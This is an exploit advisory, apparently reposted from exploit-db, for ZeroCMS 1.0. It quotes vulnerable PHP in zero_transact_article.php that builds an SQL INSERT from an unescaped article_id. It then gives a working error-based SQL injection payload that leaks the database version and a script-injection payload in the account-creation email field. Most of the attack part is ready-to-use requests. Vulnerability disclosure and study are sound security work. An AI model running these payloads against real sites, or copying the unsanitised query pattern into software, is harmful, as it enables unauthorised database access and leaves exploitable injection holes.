facebook facebook twitter rss

ZeroCMS 1.0 XSS & SQL INJECTION

Author: jsass , Published: 11-06-2014
####################################################################
Exploit: ZeroCMS 1.0 XSS & SQL INJECTION
Author: jsass
Date : 11\06\2014
Contact Twitter: @Kwsecurity
Project Site: http://www.aas9.in/zerocms/
version: 2.5
Tested on: Kali


//** Q8 GRAYHAT TEAM **\\

http://www.exploit-db.com/exploits/33702/

####################################################################

1- SQL INJECTION
File : zero_transact_article.php

case 'Submit Comment':
$article_id = (isset($_POST['article_id'])) ? $_POST['article_id'] : '';
$comment_text = (isset($_POST['comment_text'])) ?
$_POST['comment_text'] : '';
if (isset($_SESSION['user_id']) && !empty($article_id) &&
!empty($comment_text)) {
$sql = 'INSERT INTO zero_comments
(article_id, user_id, comment_date, comment_text)
VALUES
(' . $article_id . ',
' . $_SESSION['user_id'] . ',
"' . date('Y-m-d H:i:s') . '",
"' . mysql_real_escape_string($comment_text, $dbx) . '")';
mysql_query($sql, $dbx) or die(mysql_error($dbx));
}
redirect('zero_view_article.php?article_id=' . $article_id);
break;

EXPLOIT :

POST

http://localhost/zerocms-master/zero_transact_article.php?action=Submit Comment

article_id=1 AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT(0x0a,VERSION(),0x0a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

EX.

2- POST ( XSS );

http://localhost/zerocms-master/zero_transact_user.php
name=jsass&email=admin"></style></script><script>alert(1);</script>&password_1=admin&password_2=admin&action=Create+Account









####################################################################################3


Great's To : ALL MEMBERS IN SEC4EVER.COM & EXPLOIT4ARAB.COM & IS-SEC.COM

Like us on Facebook :